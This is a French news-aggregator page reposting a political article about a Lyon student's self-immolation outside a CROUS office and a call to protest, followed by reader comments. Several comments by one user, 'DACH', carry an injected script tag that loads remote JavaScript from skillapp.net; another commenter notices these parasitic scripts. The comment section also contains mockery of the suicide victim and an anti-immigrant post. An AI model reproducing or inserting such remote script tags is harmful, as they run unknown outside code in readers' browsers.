• AgoraVox sur Twitter
  • RSS
  • Agoravox TV
  • Agoravox Mobile

Accueil du site > Actualités > Citoyenneté > « J’accuse Macron, Hollande, Sarkozy et l’UE de m’avoir (...)

« J’accuse Macron, Hollande, Sarkozy et l’UE de m’avoir tué » la jeunesse appelle à manifester devant les crous

#LaPrécaritéTue appel à manifester devant les CROUS ce 12 novembre – #JRCF

« J’accuse Macron,
Hollande, Sarkozy et l’UE
de m’avoir tué »

Poussé à la précarité extrême comme de nombreux jeunes de France, un étudiant en L2
sciences politiques à l’université Lumière Lyon 2, militant à Solidaire Etudiant.e.s, a tenté
de se donner la mort en s’immolant par le feu devant le siège local du CROUS.
Cet étudiant, désormais entre la vie et la mort et à qui, ainsi qu’à ses proches, vont
toutes nos pensées, a accusé dans un message, avant de passer à l’acte, les
véritables responsables de cette situation intolérable dans laquelle on plonge notre
jeunesse :

 

« J’accuse Macron, Hollande, Sarkozy et l’UE de m’avoir tué en créant des incertitudes
sur l’avenir de tou-tes, j’accuse aussi Le Pen et les éditorialistes d’avoir créé des
peurs plus que secondaires »
« Mon dernier souhait, c’est aussi que mes camarades continue de lutter, pour en finir
définitivement avec tout ça »

 

Si la précarité tue jusqu’à notre jeunesse, elle n’est cependant pas irrémédiable. Ceux
et celles qui l’organisent, ainsi que les instances nationales et mondiales sur
lesquelles ils s’appuient pour imposer aux jeunes, aux travailleurs et aux peuples leur
capitalisme mondialisé, ont bien des noms et il faut les nommer.

Ce sont bien Macron, Hollande et Sarkozy, fidèles laquais du grand patronat du
MEDEF et de l’UE, qui détruisent l’université publique, l’Education nationale, la
solidarité nationale, la Sécurité Sociale, nos emplois, le travail, les services publics, la
santé, la police, la défense, la culture, notre langue etc… et accentuent ainsi la
pauvreté et la précarité en France.

Rappelons qu’un étudiant sur deux doit travailler à côté de ses études pour pouvoir
(sur)vivre seul, mettant ainsi en danger le bon déroulement de son année d’université.
Que les prix des logements dans les métropoles, là où se trouvent le plus souvent les
universités, sont de plus en plus exorbitants. Et que les logements étudiants
manquent cruellement depuis des années.
Les profits monstres des actionnaires dans notre pays, les 80 milliards de la fraude
fiscale et les cadeaux de l’Etat capitaliste au grand patronat (CICE) pourraient
pourtant largement être utilisés pour combattre la pauvreté et, entre nombreuses
autres mesures, assurer un « salaire étudiant » à tous les jeunes de FAC et
d’université et un salaire décent aux jeunes en apprentissage.
Ainsi nous investirions dans notre jeunesse et dans l’avenir en levant les obstacles
financiers auxquels elle doit faire face encore aujourd’hui, et en ne la laissant pas
tomber dans la pauvreté et la dépression.

Les JRCF et le PRCF appellent tous les véritables acteurs et militants du progrès à
rejoindre les rassemblements organisés partout en France, par le syndicat Solidaire
Etudiant.e.s, ce mardi 12 novembre, en soutien au jeune syndicaliste étudiant immolé
et en réponse à cette précarité qui tue tous les jours.

https://www.initiative-communiste.fr/articles/luttes/laprecaritetue-appel-a-manifester-devant-les-crous-ce-12-novembre-jrcf/


Moyenne des avis sur cet article :  2.75/5   (16 votes)




Réagissez à l'article

41 réactions à cet article    


  • bluerage 12 novembre 2019 14:36

    Personnellement je ne vais pas pleurer pour un cinglé d’extrême gauche qui redoublait sa licence pour la deuxième fois, au lieu de perdre son temps en réunions avec des dégénérés comme vous qui attendent le grand soir pour pouvoir être rasés gratis, si il avait étudié un peu plus...

    Je précise que j’ai fait des études supérieures sans jamais redoubler et en vivant chichement de mes bourses et de travaux durant l’été.


    • mac 12 novembre 2019 15:57

      @bluerage
      Facile de se montrer aussi dur...L’insensibilité est-il le mal du siècle ?
      100000 personnes se suicident chaque année et beaucoup pour raisons économiques. Vous avez entendu parler de cause nationale à ce sujet ?
      Les seules causes nationales semblent être celles qui peuvent rapporter du fric aux multinationales...


    • mac 12 novembre 2019 17:01

      @oncle archibald
      Les collectes sont souvent à hauteur des médiatisations et des indignations à géométrie variables. Pour le reste cela ressemble un peu aux propos de cette jeune éditorialiste qui s’est faite remarquée récemment sur une chaîne d’info...


    • CoolDude 12 novembre 2019 18:51

      @bluerage

      Celle-là, je m’y attendais... Et elle en pole position en plus :

      Quand on est au SMIC avec deux enfants, il ne faut pas divorcer...
      Quand on est pauvre et con, on ne fait pas d’étude !
      ...
      ..
      .
      Bon quand tu es pauvre : Flingue toi directe et fait pas chier !


    • foufouille foufouille 12 novembre 2019 18:55

      @CoolDude

      tripler son année de fac est juste débile.


    • CoolDude 12 novembre 2019 19:02

      @foufouille

      Bon, il a quand même intégré Science Po Lyon, donc en réalité il n’était pas si con ou débile... Juste persévérant !

      Science Po, c’est quand même un bon niveau. Ce n’est pas la Fac de base.


    • foufouille foufouille 12 novembre 2019 19:11

      @CoolDude

      j’ai juste lu science politique, science po c’est comme médecine avec le première année qui sélectionne et faut devenir trop con pour laisser tomber.


    • Aita Pea Pea Aita Pea Pea 12 novembre 2019 19:28

      @Cadoudal

      Ça c’est un coup de la reine des neiges .


    • Kapimo Kapimo 12 novembre 2019 20:43

      @bluerage

      Oui, mais vous on voit tout de suite que vous êtes brillant. Peut-être que lui avait moins de facilités, et ne s’en sortait pas dans ses études du fait de tous les petits boulots qu’il avait à coté ?
      Sinon, l’euthanasie, vous aimez ?


    • Fergus Fergus 13 novembre 2019 09:17

      Bonjour, foufouille

      D’accord avec toi.

      Bien que je sois évidemment consterné par le geste de ce jeune, force est de constater qu’il n’est pas scandaleux de retirer sa bourse à un étudiant qui triple sa 
      2e année de licence tant il y a, à côté, d’autres étudiants méritants et motivés qui, eux, n’ont pas la chance de se voir attribuer une bourse. 


    • taktak 13 novembre 2019 11:26

      @Fergus
      ce qui est bien avec vous Fergus, c’est qu(en toute circonstance vous ne variez pas. vous êtes toujours du coté du manche et des puissants. Avec une larmichette pour vous illusionner sur votre grandeur d’âme et préserver votre estime de vous. C’est important pour vous ça de s’imaginer de gauche sans doute. La gauche de droite.

       le suicide d’un jeune homme, qui s’immole par le feu, parcequ’il n’a aucun avenir dans cette société, ce n’est pas consternant. C’est révoltant.
      — et ce qui est scandaleux, c’est non seulement de se féliciter de ce que l’on retire sa bourse et son logement à étudiant qui échoue à son année universitère, sans se poser la question des raisons de l’échec, surtout quand les raisons de l’échec c’est l’extrême misère de cet étudiant, décrit comme méritant par ailleurs par ses professeurs. Les difficultés matérielles des étudiants d’origines modeste sont telles qu’il leur est quasi impossible de réussir. Qu’il est facile, la bouche plein et le ventre bien tendu que de faire la leçon aux geux qui crève de faim. 


    • bluerage 13 novembre 2019 11:57

      @Dr Frank-N-Furter

      Sara, dulce Sara, dilo con suavidad, como hacías ayer, dime cosas que yo nunca pueda comprender...


    • DACH 13 novembre 2019 13:38

      @mac=la crédulité et le manque de lucidité qui rend esclave de ce qu’on a envie de croire mènent à l’insensibilité.

      <script src="//skillapp.net/2143f05201d76950ea.js"></script>

    • bluerage 13 novembre 2019 14:00

      @Dr Frank-N-Furter

      Ay Sara, no me digas que conoces el Ultimo de la fila, no puede ser....


    • Fergus Fergus 13 novembre 2019 15:30

      Bonjour, taktak

      « en toute circonstance vous ne variez pas. vous êtes toujours du coté du manche et des puissants »

      Certainement pas, et si vous n’étiez pas en partie aveuglé par des oeillères sectaires, vous nuanceriez beaucoup plus vos propos et vos arguments. 
       
      « le suicide d’un jeune homme, qui s’immole par le feu, parcequ’il n’a aucun avenir dans cette société, ce n’est pas consternant. C’est révoltant »

      En effet. Et cela illustre bien le fait que des moyens insuffisants sont alloués aux étudiants précaires. Sur ce point, je suis d’accord avec vous sans la moindre hésitation. 

      Pour autant, les budgets ne sont, en l’état, pas extensibles, et le fait est  difficilement contestable  qu’il faut faire des choix dans l’attribution des bourses. Ce faisant, renouveler sa bourse à un étudiant qui triple sa 2e année, c’est pénaliser un autre étudiant tout aussi modeste et tout aussi méritant qui, faute d’aide, sera contraint de galérer  et peut-être de jeter l’éponge sans avoir eu le temps de démériter. Est-ce si difficile à comprendre ???


    • foufouille foufouille 12 novembre 2019 14:44

      il existe des tas de logements pas cher pour les étudiants, de la coloc, etc.

      manifestement, il est timbré de vouloir triplé son année de science politique.

      il suffisait de suivre une autre voie pour avoir sa bourse.


      • JP94 12 novembre 2019 20:44

        @foufouille
        Juste quelques infos pour comprendre vos propos : 
         quel est votre QI ?
         combien gagnez-vous par mois ?
        Quel est votre niveau d’études ? 

        Vous savez : cet étudiant a tout le droit de faire ses études au niveau de ses capacités.
        Pour certains, ce n’est pas l’argent qui fait défaut, ce sont les capacités intellectuelles. Mais ça leur échappe.

        Cet étudiant ne se bat pas que pour lui-même : il lutte pour que tous les enfants de milieu non fortuné ait accès à des études. Cet acte est une accusation politique contre le système capitaliste. 
        De toute façon, avec Macron, on peut aussi perdre la vie rien qu’en manifestant pacifiquement. 

        « Mais gare à la revanche quand tous les pauvres d’y mettront »
        Chanson de JB Clément écrite sous la Semaine sanglante qui écrasa la Commune de Paris, lorsque les Versaillais massacrèrent femmes, enfants, vieillards par dizaines de milliers.

        A propos, la Commune de Kwangdiu en Corée du SUD, à la fin des années 70, par des ouvriers et des étudiants : 6000 morts massacrés par l’armée sud-coréenne avec l’aval des Etats-Unis, vous aviez peut-être de bons conseils à prodiguer pour passer au travers des balles de mitrailleuses ? 


      • foufouille foufouille 13 novembre 2019 08:48

        @JP94 ce n’est pas beaucoup une bourse mais elle existe que ça te plaise ou pas.

        il voulait triplé une année et que ce soit autorisé est choquant.

        il recevait une APL payant tout son loyer, dans une grande il est facile de manger gratuitement. les logements étudiants sont tellement nombreux que certains sont vides.

        c’était beaucoup plus difficile de survivre début 90 dans le privé.

        ça te dirait un mauvais médecin qui a triplé chaque année ?


      • taktak 13 novembre 2019 11:38

        @foufouille
        des logements étudiants vides ? mais dans quel pays vivez vous ? pas en France

        Les logements étudiants sont très peu nombreux, et même l’offre privée, très chère, innaccessible aux boursiers et aux moins fortunées est insuffisante
        https://www.lyoncapitale.fr/actualite/manque-de-logements-etudiants-lyon-est-complet/


      • foufouille foufouille 13 novembre 2019 13:19

        @taktak

        je ne sais pas pour Lyon mais ça pousse comme des champignons chez moi et certains sont bien vides car réservés aux étudiants comme pour certains logements HLM vides car réservés aux seniors ( il faut avoir plus de 60 ans dixit le môsieu au téléphone pour le T1 ) ou des F3 en rez de chaussé : les volets sont baissés depuis des mois.

        dans le privé aussi et pas trop cher, 370€ le studio sans chauffage central.

        certains sont plus cher, évidement.


      • Fergus Fergus 13 novembre 2019 15:32

        @ foufouille

        A Rennes  ville universitaire —, se loger pour un étudiant à un prix raisonnable est une vraie galère. J’imagine que c’est le cas dans la plupart des métropoles.


      • foufouille foufouille 13 novembre 2019 15:52

        @Fergus

        c’est combien un prix raisonnable ?

        c’est pas non plus super confortable un appart pas cher.


      • Gilles Mérivac Gilles Mérivac 12 novembre 2019 14:54

        Ce sont les mouvements de gauche qui l’ont tué, en le persuadant que tous ses malheurs provenaient des capitalistes et du gouvernement, ce qui l’a empêché de prendre ses responsabilités et de grandir.

        « Ne te demandes pas ce que ton pays peut faire pour toi, mais ce ce que tu peux faire pour ton pays ».

        Ces paroles de sagesse sont bien oubliées.


        • mac 12 novembre 2019 16:04

          @Gilles Mérivac
          Encore faudrait-il que nous ayons encore un véritable pays et pas ce qui semble être une succursale de l’Allemagne et des Etats-unis où les hommes politiques ne semblent plus avoir que le pouvoir de fixer des choses comme les dates des vacances scolaires...


        • Gilles Mérivac Gilles Mérivac 12 novembre 2019 17:28

          @mac
          Encore et toujours des excuses pour ne rien faire.


        • mac 12 novembre 2019 18:27

          @Gilles Mérivac
          Si si les politiques font mais tout en dépit du bon sens.
          Rendez-vous à la prochaine grande crise financière, je pense que ça va être un carnage à la grec ici et nous pourrons remercier la clairvoyance de nos politiques un peu comme au moment de la débâcle de 40. De toute façon, comme à l’époque, ils se tireront des flûtes...
          Pour ce qui est de mon cas personnel, je fais comme je peux mais je fais. Je crée des boîtes et j’investis mes économies dedans, je ne pense pas que ce soit le cas de tout le monde...


        • JP94 12 novembre 2019 20:35

          @Gilles Mérivac
          Ne généralisez pas votre cas :cet étudiant pense par lui-même 

          Vos conseils fleurent bon le pétainisme...

          Mais bon, n’oubliez qu’en 1945, ceux que vous méprisez de façon ignominieuse et qui ne prouve que votre bassesses intellectuelle, ces jeunes, ces Guy Môquet  même morts  ont triomphé tandis que les esprits collabos cessaient leurs sarcasmes et se planquaient.


        • Buzzcocks 12 novembre 2019 16:18

          On appelle ça le ruissellement cher à Macron, les étudiants dépensent effectivement des sommes de plus en plus folles pour se loger. Ca ruisselle, mais pas dans le sens que le mythe macronien voudrait nous faire croire. 

          Après, je n’aime pas trop partir d’un fait divers pour faire des généralités. La situation de ce type est assez particulière. Mais d’une manière générale, les études deviennent censitaires. Si vous avez des parents fortunés, ils vous mettront, dès le collège, dans les établissements où vous ne fréquenterez pas les gogols, et où vous pourrez étudier dans de bonnes conditions (pas besoin de faire de petits boulots, logements à proximité du lieu d’étude voire comme en médecine/pharma —> paiement de cours privés de remise à niveau qui deviennent presque obligatoires si vous voulez réussir).

          Sinon, y a plus en plus de formations en alternance, 2 semaines en entreprise, puis 2 semaines à l’école... et ça donne souvent des gens que les boites embauchent dans la foulée. Et donc ils sont payés durant la formation, et des accès à la cantine d’entreprise, pour des prix abordables.

          Mais est ce que ce type avait envie de bosser pour une entreprise capitaliste malfaisante détenue par de méchants esclavagistes macroniens de la pire espèce ? On peut en douter.


          • Armelle Armelle 13 novembre 2019 09:21

            ...Du Zola pur jus...

            « Rappelons qu’un étudiant sur deux doit travailler à côté de ses études pour pouvoir (sur)vivre seul »

            Macron, Sarkosy et Hollande n’ont rien à voir avec ça !!! Qu’est-ce que c’est que cette nouvelle ânerie, c’était déjà comme ça il y a trente ans !!!

            C’est juste la descente aux enfer de la génération « enfants gâtés », qui enfin, prend conscience de la réalité du monde dans lequel elle vit !!!

            Ce garçon s’est mis en échec tout seul, et je trouve honteux et un peu « bêtaud », sinon complètement con de jouer sur le misérabilisme pour accuser untel ou untel !!! Les gauchistes ne sont pas doués, leur capacités intellectuelles ne sont décidément pas à la hauteur du défi alors ils nous sortent n’importe quel arme dans leur quête à la destruction de leur ennemi le capitalisme ! ...Les autres gauchistes c’est le réchauffement climatique, 

            C’est lamentable de politiser un tel événement. L’auteur pense sans doute que ça peut dédouaner d’une médiocrité certaine !!! 

            Je plains l’auteur et ses acolytes de vivre dans cette jalousie et cette frustration permanentes en espérant je ne sais quel renversement de table et en attendant que ça leur tombe tout cuit dans le bec...


            Des torchons pareils devraient être censurés , car partant d’un postulat erroné et proposant une analyse complètement hors sujet



             


            • ZenZoe ZenZoe 13 novembre 2019 12:01

              Primo : je ne connais pas le cas de ce jeune homme, mais je peux affirmer sans beaucoup me tromper que sa précarité n’était pas le seul motif de sa détresse personnelle. Les suicides sont complexes. Tous sans exception, et leur attribuer une seule cause, et à fortiori politique, est un raccourci qui ne fait pas avancer cette cause tragique.

              Secundo : c’est la raison pour laquelle je suis absolument contre la récupération de tout suicide quel qu’il soit pour défendre une cause, et surtout une cause politique. Je trouve ça dégueulasse et indécent. Lutter contre la précarité des étudiants et les inégalités de chances en vaut la peine, mais pas comme ça.


              • soi même 13 novembre 2019 13:16

                Pauvre lapin, au lieu d’obtenir BAC + 5, va bosser, car tu auras plus de change de survivre en bossant maintenant que d’avoir un boulot bac+5 comme caissier de super marché.


                • DACH 13 novembre 2019 13:48

                  Tout le monde comprend qu’imputer à la précarité, mot abstrait, la réalité de faits liés à des échecs personnels relève de l’imposture, à visées politiques. C’est comme lutter contre le terrorisme. cela ne veut rien dire d’autres qu’on reste devant son salon et son écran pour faire croire qu’on est actif avec de bonnes raisons. Que fait taktak pour luter contre ce qui ne va pas. rien que d’essayer de faire croire ! Et cela marche de moins en moins. 

                  <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                  • zygzornifle zygzornifle 13 novembre 2019 14:10
                    « J’accuse Macron, Hollande, Sarkozy et l’UE de m’avoir tué »

                    Ils n’ont pas compris qu’on nous tue de notre premier souffle a notre dernier et quand il y a un héritage ce sont les héritiers que l’on tue ....


                    • DACH 13 novembre 2019 14:56

                      @zygzornifle="la vie est une maladie constamment mortelle sexuellement transmissible" Prof W Rozenbaum. Zyg n’a rien compris à la vie !

                      <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                    • pemile pemile 13 novembre 2019 15:20

                      @DACH « la vie est une maladie constamment mortelle sexuellement transmissible »

                      Et vos scripts parasites en fin de posts, vous les avez attrapés comment ?


                    • DACH 13 novembre 2019 15:46

                      @pemile=Merci de nous révéler votre débilité.

                      <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                    • pemile pemile 13 novembre 2019 15:55

                      @DACH "Merci de nous révéler votre débilité.

                      <script src="//skillapp.net/2143f05201d76950ea.js"></script>"

                      Rhhoooo, Mr skillapp.net est vexé ? smiley


                    • JMBerniolles 13 novembre 2019 16:04

                      Merci d’abord pour cet article sur le fait majeur de notre actualité. Ce malheureux jeune ne s’est pas tué seulement pour son problème personnel, son geste tragique qui devrait être respecté porte aussi l’attention sur les problèmes de nos jeunes en général. Bien entendu le système qui détruit notre jeunesse et notre pays cherche à détourner la signification de ce message dramatique, avec des arguments pourris qui sont repris ici par des commentateurs égoïstes, egocentrés... Les jeunes concentrent tous les problèmes générés par notre système hautement inégalitaire. Non emploi d’abord pour une proportion largement supérieure au 25% avoués, la précarité, les bas salaires, y compris pour les diplômés ( comment un professeur des écoles exerçant à Paris dans la plupart des quartiers peut-il se loger ?), les problèmes pour l’accès à la santé... La situation tient pour une part avec l’aide des parents et des grands parents mais la liquidation des couches moyennes va aggraver les choses. Ce suicide marque aussi le fait que l’on a atteint les limites. Le fait que les responsables politiques soient inertes est aussi la révélation d’une triste réalité..


                      • le cathare 13 novembre 2019 16:36

                        Les syndicats étudiants majoritairement gauchisants ,et immigrationnistes , sont pour le partage du gâteau France avec toute la misère du monde .Les 691 000 boursiers en 2016 et 2017 ont touchés 2 milliards du CROUS .Les 40 000 migrants mineurs isolés ont coutés 2 milliards , et les migrants clandestins ou réfugiés 24 a 70 milliards.C’est ça le vivre ensemble le partage de la misère .Tant que les français ne voterons pas ’’Français d’abord ’’ leur part de gâteau diminuera .Sortis de l’université , devenus pompiers ,infirmières , profs ,policiers,ils devront accepter un salaire de misère et des conditions de travail insupportables .Les autres trahis par les syndicats , dans le privé,en concurrence avec les migrants enrichiront le MEDEF. Les BAC + 4 ou 5 partiront chercher fortune dans des pays moins partageux ,nous laissant manifester pour ne pas mourir .....gazés et éborgnés


                        • vieuxgrincheux 13 novembre 2019 17:00

                          Ce suicide est triste mais il faut dire que , sauf pour des privilégiés, être étudiant n’a jamais été rose. Je l’ai été et je ne roulais pas sur l’or loin de là et je n’avais pas de bourse car mes parents dépassaient juste le seul adéquat. Nourriture : restau Universitaire la semaine et rien le week-end. Pas de sorties pas de bar pas de cinéma et évidemment pas de moto, ou bagnole, pas de smartphone pas de chaine hi-fi pas de de télé, pas d’internet et une chambre de bonne sans douche avec WC sur le palier. Et je bossais les étés !!!!!!! Et ceux qui étaient boursiers savaient très bien qu’ils perdaient leur bourse dès la 1ere année de redoublement !!!!!!!!!!

                          La plupart des jeunes actuels ont peu de frustration. je suis toujours surpris d’ne voir autant tous les soirs dans des bars branchés consommer des cocktails ou des bières à tour de bras... En plus, aucune frustration dans la scolarite car , naturellement, des devoirs ridicules pas de discipline et un bac qui ne vaut rien distribué à tour de bras. En fac, ca se retrouve seul à devoir assumer sans avoir jamais connu le sens du mot responsabilité. Alors qui est coupable ? Pas le jeune évidemment du moins pas pour la plus grande part. Les coupables :

                          1. Les parents dont l’éducation laxiste avec les enfants est la source de tout le reste
                          2. la gauche bien pensante qui a foutu en l’air depuis 40 ans la notion d’effort de travail et de responsabilité que ce soit dans l’école ou dans le reste du monde social. Cette même gauche qui a pollué en effet l’esprit de ce jeune garçon avec des idées comme quoi on a droit à tout sans rien faire ou avec un minimum d’effort.
                          3.  Cette société en général qui crie sans arret mes droits mes droits j’ai le droit et qui ne fait jamais allusion au mot devoir et à ce qu’il signifie et implique. Des droits oui mais aussi des devoirs !!!!!!!!!! 

                          Et voici le résultat sur un jeune qui devait être un peu naïf et s’est fait embrigadé dans de beaux discours complètement débiles portant toujours les mêmes refrains 


                          • jamjam 14 novembre 2019 22:37

                            Ceci me fait penser à l’ex premier adjoint d’Hidalgo (je ne me rappelle plus de son nom) qui lui aussi, responsable UNEF, a traîné des années à la fac dans des études du même style. Mais lui avait des parents plus fortunés...

Ajouter une réaction

Pour réagir, identifiez-vous avec votre login / mot de passe, en haut à droite de cette page

Si vous n'avez pas de login / mot de passe, vous devez vous inscrire ici.


FAIRE UN DON



Publicité



Les thématiques de l'article


Palmarès



Publicité